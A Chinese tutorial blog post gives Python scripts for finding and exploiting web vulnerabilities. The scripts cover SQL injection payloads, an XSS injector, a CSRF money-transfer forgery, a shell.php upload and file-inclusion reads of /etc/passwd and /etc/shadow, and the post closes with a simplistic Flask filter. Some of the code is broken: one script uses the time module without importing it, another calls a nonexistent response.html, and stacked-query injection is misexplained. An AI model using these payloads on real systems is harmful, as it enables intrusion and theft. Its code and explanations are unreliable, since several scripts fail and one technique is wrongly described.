当前位置:   article > 正文

python渗透工具编写学习笔记:9、web漏洞检测与利用脚本_python语言写网络渗透测试脚本

python语言写网络渗透测试脚本

前言

    此篇我们来学习python编写web渗透中检测与利用漏洞的工具,在本篇的最后,我们将学习漏洞的防治。坚持科技向善,勿跨越法律界限,代码仅供教学目的。初出茅庐,如有错误望各位不吝赐教。

9.1 requests库

    编写web漏洞检测与利用脚本需要具备一定的编程和网络安全知识。尤其是requests库,它是一个用来发送HTTP请求的Python库,提供了简单和直接的方式来发送各种类型的HTTP请求,包括GET、POST、PUT、DELETE等。那么我们先来复习一下requests库的基本用法:

发送GET请求: 使用requests.get(url)发送GET请求,其中url为请求的URL地址,返回一个Response对象。

  1. import requests
  2. response = requests.get('https://www.example.com')
  3. print(response.text) # 打印响应内容
  4. print(response.status_code) # 打印响应状态码

发送POST请求: 使用requests.post(url, data)发送POST请求,其中url为请求的URL地址,data为请求的数据。

  1. import requests
  2. data = {'key1': 'value1', 'key2': 'value2'}
  3. response = requests.post('https://www.example.com', data=data)
  4. print(response.text) # 打印响应内容
  5. print(response.status_code) # 打印响应状态码

添加请求头: 使用requests.get(url, headers)requests.post(url, headers)添加请求头,其中headers为字典形式的请求头。

  1. import requests
  2. headers = {'User-Agent': 'Mozilla/5.0'}
  3. response = requests.get('https://www.example.com', headers=headers)
  4. print(response.text) # 打印响应内容
  5. print(response.status_code) # 打印响应状态码

处理响应: Response对象包含了响应的内容、状态码、响应头等信息,可以使用以下属性来处理响应:

  • response.text:获取响应内容的文本形式。
  • response.content:获取响应内容的字节形式。
  • response.status_code:获取响应的状态码。
  • response.headers:获取响应头的字典形式。
  • response.json():将响应内容解析为JSON格式。

  1. import requests
  2. response = requests.get('https://www.example.com')
  3. print(response.text) # 打印响应内容
  4. print(response.status_code) # 打印响应状态码
  5. print(response.headers) # 打印响应头
  6. print(response.json()) # 解析响应内容为JSON格式

9.2 SQL注入

     SQL注入漏洞应该算得上我们最熟悉的漏洞之一了,是一种常见的网络安全攻击技术,旨在利用应用程序对用户输入的不充分过滤或验证,向数据库注入恶意的 SQL 代码,直接操作数据库并执行自己的恶意操作。接下来我们将从SQL注入的五种类型来编写检测工具。

9.2.1 时间盲注

    时间盲注中,攻击者利用应用程序的响应时间来判断注入的SQL语句是否成功执行。通过逐个尝试不同的条件和语句,攻击者可以逐步推断出数据库中的信息。

以下一个Python脚本用于扫描SQL时间盲注:

  1. import requests
  2. # 设置目标URL和时间盲注参数
  3. url = "http://example.com"
  4. param = "id"
  5. # 设置时间盲注payload和判断条件
  6. payload = "' AND IF(SLEEP(5),1,0) -- "
  7. condition = "页面响应时间大于5秒"
  8. for i in range(1, 11):
  9. # 构造SQL注入payload
  10. inject = "' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),{},1))={},SLEEP(5),1) -- ".format(i, ord('test'[i-1]))
  11. # 构造带注入payload的参数
  12. data = {param: inject}
  13. # 发送请求并计时
  14. start_time = time.time()
  15. response = requests.get(url, params=data)
  16. end_time = time.time()
  17. # 判断注入是否成功
  18. if (end_time - start_time) > 5:
  19. print("第{}个字符注入成功!".format(i))
  20. # 如果注入成功,继续判断下一个字符
  21. if i < 10 and (end_time - start_time) > 5:
  22. continue
  23. # 如果注入失败,直接退出循环
  24. elif i < 10 and (end_time - start_time) <= 5:
  25. print("注入失败!")
  26. break
  27. # 如果已经判断到最后一个字符,输出结果
  28. else:
  29. print("注入成功!")
  30. break

使用时需要将URL和参数修改为目标的URL和时间盲注参数。设置payloadcondition来匹配正在尝试的注入类型和判断条件。

脚本将自动逐个字符地发送SQL注入payload,并根据响应时间来判断注入是否成功。成功注入后,将输出相应的字符。如果注入失败,将输出提示信息。

9.2.2 布尔盲注

    布尔盲注中,攻击者利用应用程序对SQL语句返回的布尔值进行判断,从而推断出数据库中的信息。通过构造不同的条件和语句,攻击者可以逐步推断出数据库中的数据。

以下Python脚本,用于扫描SQL布尔盲注:

  1. import requests
  2. # 目标URL
  3. url = "http://example.com/test.php"
  4. # 布尔盲注payload
  5. payloads = ["' OR 1=1 -- ", "' OR 1=2 -- "]
  6. # 发送请求,根据响应判断是否存在布尔盲注
  7. for payload in payloads:
  8. # 构造请求参数
  9. params = {
  10. "username": payload,
  11. "password": "test"
  12. }
  13. # 发送POST请求
  14. response = requests.post(url, data=params)
  15. # 根据响应判断是否存在布尔盲注
  16. if "Login successful" in response.text:
  17. print("布尔盲注存在,payload: " + payload)
  18. else:
  19. print("布尔盲注不存在")

使用时,需要将url替换为目标URL,并根据需要修改payloads列表中的注入payload。脚本将发送POST请求并检查响应中是否包含"Login successful"以判断是否存在布尔盲注。

9.2.3 报错注入

    报错注入中,攻击者利用应用程序的错误消息来获取关于数据库结构和数据的信息。通过注入恶意的SQL语句,攻击者可以触发应用程序生成错误消息,其中包含有用的信息。

以下Python脚本,用于扫描SQL报错注入漏洞:

  1. import requests
  2. def scan_sql_injection(url):
  3. payloads = ["' OR '1'='1'",
  4. "' OR '1'='1'--",
  5. "' OR '1'='1'/*",
  6. "') OR '1'='1'--",
  7. "') OR '1'='1'/*",
  8. "') OR ('1'='1",
  9. "') OR ('1'='1'--",
  10. "') OR ('1'='1'/*",
  11. "') OR 'a'='a",
  12. "') OR 'a'='a'--",
  13. "') OR 'a'='a'/*",
  14. "') OR ('a'='a",
  15. "') OR ('a'='a'--",
  16. "') OR ('a'='a'/*"]
  17. for payload in payloads:
  18. full_url = url + payload
  19. response = requests.get(full_url)
  20. if "error" in response.text:
  21. print(f"[VULNERABLE] SQL Injection detected: {full_url}")
  22. if __name__ == "__main__":
  23. url = input("Enter the URL to scan: ")
  24. scan_sql_injection(url)

运行后,程序将提示输入要扫描的URL,输入URL后程序将使用预定义的payload列表进行SQL注入测试。如果检测到SQL注入,则会输出相关信息。

9.2.4 联合查询注入

    联合查询注入利用了应用程序中执行SQL查询语句的方式。当应用程序接收到用户的输入并构造SQL查询语句时,攻击者通过构造恶意的输入,使得应用程序在执行SQL查询时将额外的SQL语句拼接到原始查询中。这样,攻击者可以执行任意的数据库操作,如获取敏感数据、修改数据或者执行其他恶意操作。

以下Python脚本,用于扫描SQL联合查询注入漏洞:

  1. import requests
  2. # 目标URL
  3. target_url = "http://example.com"
  4. # 扫描函数
  5. def scan_union_injection(url):
  6. # 注入语句示例
  7. payload = "' UNION SELECT NULL,NULL,NULL--"
  8. # 发送GET请求
  9. response = requests.get(url + payload)
  10. # 判断注入是否成功
  11. if "Error" in response.text:
  12. print("[+] SQL注入漏洞存在:" + url)
  13. # 调用扫描函数
  14. scan_union_injection(target_url)

9.2.5 堆查询注入

    堆查询注入漏洞利用了应用程序中对堆栈(或堆)的操作不当,从而导致攻击者可以执行恶意的SQL查询语句。

以下Python脚本,用于扫描网站的SQL注入漏洞:

  1. import requests
  2. # 定义目标URL
  3. target_url = 'http://example.com/some_page.php'
  4. # 定义注入字符串,替换通常的注入点位置
  5. injection_strings = ["' OR '1'='1", "' OR 'a'='a", "' OR '1'='1' LIMIT 1 --"]
  6. # 发送GET请求并检查注入漏洞
  7. def check_sql_injection(url, payload):
  8. # 构造带有注入字符串的URL
  9. injected_url = url + '?param=' + payload
  10. # 发送请求并获取响应
  11. response = requests.get(injected_url)
  12. # 检查响应中的关键字来确定是否存在注入漏洞
  13. if 'error' in response.text:
  14. print('SQL注入漏洞存在:', injected_url)
  15. # 遍历所有注入字符串进行检查
  16. for injection_string in injection_strings:
  17. check_sql_injection(target_url, injection_string)

9.3 XSS

    XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,可以通过在用户输入的内容中注入恶意脚本,从而获取用户的敏感信息或者执行恶意操作。下面是一个简单的Python脚本,用于检测XSS漏洞:

  1. import requests
  2. def check_xss(url):
  3. payload = "<script>alert('XSS')</script>"
  4. # 构造带有payload的请求
  5. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
  6. response = requests.get(url + payload, headers=headers)
  7. # 检查响应中是否包含payload
  8. if payload in response.text:
  9. print(f"XSS漏洞存在:{url}")
  10. else:
  11. print(f"XSS漏洞不存在:{url}")
  12. # 测试代码
  13. if __name__ == "__main__":
  14. urls = ['http://example.com/', 'http://example.com/page?param=<script>alert("XSS")</script>']
  15. for url in urls:
  16. check_xss(url)

扫描到漏洞之后,我们再来编写一个XSS 利用脚本:

  1. import requests
  2. import urllib.parse
  3. # 目标网站 URL
  4. target_url = 'http://example.com/login.php'
  5. # 注入的恶意脚本
  6. xss_payload = '<script>alert("XSS Vulnerability!");</script>'
  7. # 构造恶意脚本的请求参数
  8. payload = {
  9. 'username': xss_payload,
  10. 'password': 'password',
  11. 'submit': 'submit'
  12. }
  13. # 发送 POST 请求,注入恶意脚本
  14. response = requests.post(target_url, data=payload)
  15. # 打印响应结果
  16. print(response.text)

注:在实际使用中,需要根据目标网站的参数名称和注入点来修改 payload 字典的键和值。此外,还可以使用编码技术来绕过一些过滤和防御措施,例如使用 URL 编码来绕过特殊字符过滤。

9.4 CSRF

    CSRF(跨站请求伪造)是一种web攻击方式,攻击者通过诱骗用户访问恶意网站,利用用户在已认证的网站上的身份进行伪造请求,从而执行未经用户授权的操作。这种攻击方式通常会利用一些社会工程学手段,比如诱导用户点击恶意链接、打开恶意邮件等。

下面我们来编写一个简单的Python脚本,用于扫描网站中的CSRF漏洞:

  1. import requests
  2. def check_csrf(url):
  3. session = requests.Session()
  4. # 发送get请求获取页面的内容和cookies
  5. response = session.get(url)
  6. # 获取页面中的所有表单
  7. forms = response.html.find('form') # 使用合适的方法获取页面中的所有表单
  8. for form in forms:
  9. # 检查表单是否包含csrf令牌
  10. csrf_token = form.find('input', {'name': 'csrf_token'}) # 使用合适的方法查找csrf令牌
  11. if csrf_token:
  12. # 构造POST请求,尝试提交表单数据
  13. payload = {
  14. 'username': 'admin',
  15. 'password': 'password',
  16. 'csrf_token': csrf_token[0].value,
  17. }
  18. response = session.post(url, data=payload)
  19. # 检查响应中是否存在CSRF保护机制
  20. if 'CSRF token invalid' in response.text:
  21. print(f"CSRF漏洞存在:{url}")
  22. else:
  23. print(f"CSRF漏洞不存在:{url}")
  24. else:
  25. print(f"表单中未找到CSRF令牌:{url}")
  26. # 测试代码
  27. if __name__ == "__main__":
  28. urls = ['http://example.com/', 'http://example.com/login', 'http://example.com/profile']
  29. for url in urls:
  30. check_csrf(url)

注:此脚本只是一个简单的示例,不能保证完全检测所有的CSRF漏洞。

下面我们来学习如何使用Python编写一个CSRF利用脚本:

  1. import requests
  2. # 设置目标URL和要执行的操作
  3. target_url = "http://example.com/vulnerable-page"
  4. action = "transfer-money"
  5. # 构造恶意请求的参数
  6. payload = {
  7. "amount": "10000",
  8. "to_account": "attacker-account"
  9. }
  10. # 发送恶意请求,利用CSRF漏洞执行操作
  11. response = requests.post(target_url, data=payload)
  12. # 检查操作是否成功
  13. if response.status_code == 200:
  14. print("CSRF exploit successful!")
  15. else:
  16. print("CSRF exploit failed.")

9.5 文件上传漏洞 

    文件上传漏洞,是指攻击者利用应用程序中的文件上传功能,上传恶意文件或可执行的代码文件,从而获取服务器的控制权或实施其他恶意行为。

以下是一个简单的Python代码示例,用于扫描网站是否存在文件上传漏洞:

  1. import requests
  2. def scan_vulnerable(url):
  3. # 尝试上传一个简单的文本文件
  4. files = {"file": ("test.txt", "This is a test file")}
  5. response = requests.post(url, files=files)
  6. # 判断上传是否成功,可根据实际情况修改判断条件
  7. if response.status_code == 200 and "File uploaded successfully" in response.text:
  8. print(f"{url} 存在文件上传漏洞")
  9. else:
  10. print(f"{url} 不存在文件上传漏洞")
  11. if __name__ == "__main__":
  12. url = input("请输入要扫描的网址:")
  13. scan_vulnerable(url)

在这个例子中,我们使用了requests库来发送HTTP请求,并使用POST方法上传一个简单的文本文件。通过检查服务器的响应,判断文件上传是否成功。如果上传成功并且服务器返回了上传成功的消息,就说明存在文件上传漏洞。

接下来我们来编写一个简单的Python脚本,用于文件上传利用:

  1. import requests
  2. # 设置目标URL和要上传的文件名
  3. target_url = "http://example.com/upload.php"
  4. filename = "shell.php"
  5. # 构造文件上传请求
  6. files = {"file": (filename, open(filename, "rb"), "multipart/form-data")}
  7. # 发送文件上传请求
  8. response = requests.post(target_url, files=files)
  9. # 检查上传是否成功
  10. if response.status_code == 200:
  11. print("文件上传成功!")
  12. else:
  13. print("文件上传失败!")

使用时,需要将target_url替换为目标网站的文件上传接口地址,将filename替换为要上传的文件名。

9.6 文件包含漏洞 

    文件包含漏洞,是指在Web应用程序中,存在一种未能正确过滤用户输入的漏洞,使得攻击者能够通过构造特殊的文件路径,将任意文件(包括系统文件和应用程序文件)包含到执行环境中,从而执行任意代码。

文件包含漏洞通常会出现在动态网页脚本语言中,如PHP等。攻击者可以通过构造恶意的URL参数,将一个包含攻击代码的文件引入到页面中。当页面在服务器端解析时,攻击代码也会被执行,从而使攻击者能够控制服务器的执行环境,进而进行恶意操作。

在Python中,我们可以使用以下代码来检测文件包含漏洞:

  1. import requests
  2. # 定义目标URL
  3. target_url = "http://example.com/page.php?page="
  4. # 定义要尝试包含的文件路径列表
  5. file_paths = [
  6. "/etc/passwd",
  7. "/etc/shadow",
  8. "/var/www/html/index.php",
  9. "c:\\windows\\system32\\drivers\\etc\\hosts"
  10. ]
  11. # 遍历文件路径列表,发送请求并打印响应结果
  12. for file_path in file_paths:
  13. url = target_url + file_path
  14. response = requests.get(url)
  15. print("Response for {}: {}".format(file_path, response.text))

代码通过发送请求来尝试包含不同的文件路径,然后打印出每个文件路径对应的响应结果。这样可以检测是否存在文件包含漏洞。

接下来我们来编写一个文件包含利用脚本:

  1. import requests
  2. def exploit_file_inclusion(url, file_path):
  3. payload = f"{url}/vulnerable_page.php?file={file_path}"
  4. response = requests.get(payload)
  5. if response.status_code == 200:
  6. print(response.text)
  7. else:
  8. print("Exploit failed")
  9. # 示例用法
  10. exploit_file_inclusion("http://example.com", "/etc/passwd")

脚本使用requests库发送HTTP请求,利用文件包含漏洞获取目标服务器上的敏感文件(例如/etc/passwd)。需要将参数替换为目标网站的URL,将参数替换为想要获取的文件路径,urlfile_path 。

9.7 漏洞防护

    最后,我们来使用Flask框架实现一个简单的Web应用,通过@app.before_request装饰器,对每个请求进行预处理和漏洞防护。读者可以根据实际需求,添加更多的漏洞防护规则,比如防止路径遍历、文件上传漏洞等。

  1. import re
  2. from flask import Flask, request, abort
  3. app = Flask(__name__)
  4. @app.before_request
  5. def filter_requests():
  6. # 过滤JavaScript标签
  7. if re.search(r'<script.*?>', request.path):
  8. abort(403)
  9. # 过滤SQL注入字符
  10. sql_injection_chars = [';', '--']
  11. for char in sql_injection_chars:
  12. if char in request.path:
  13. abort(403)
  14. # 过滤XSS攻击字符
  15. xss_chars = ['<', '>', '&']
  16. for char in xss_chars:
  17. if char in request.path:
  18. abort(403)
  19. # 其他漏洞防护规则...
  20. if __name__ == '__main__':
  21. app.run()

注:在实际生产环境中,单纯依赖这个脚本来防护Web漏洞是不够的,因为漏洞的种类和复杂性太多。最好结合其他防护措施,如使用Web应用防火墙(WAF)等。

好了,到这里就是今天的全部内容了,那么在这里祝各位读者们圣诞快乐!!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Cpp五条/article/detail/672332
推荐阅读
相关标签
  

闽ICP备14008679号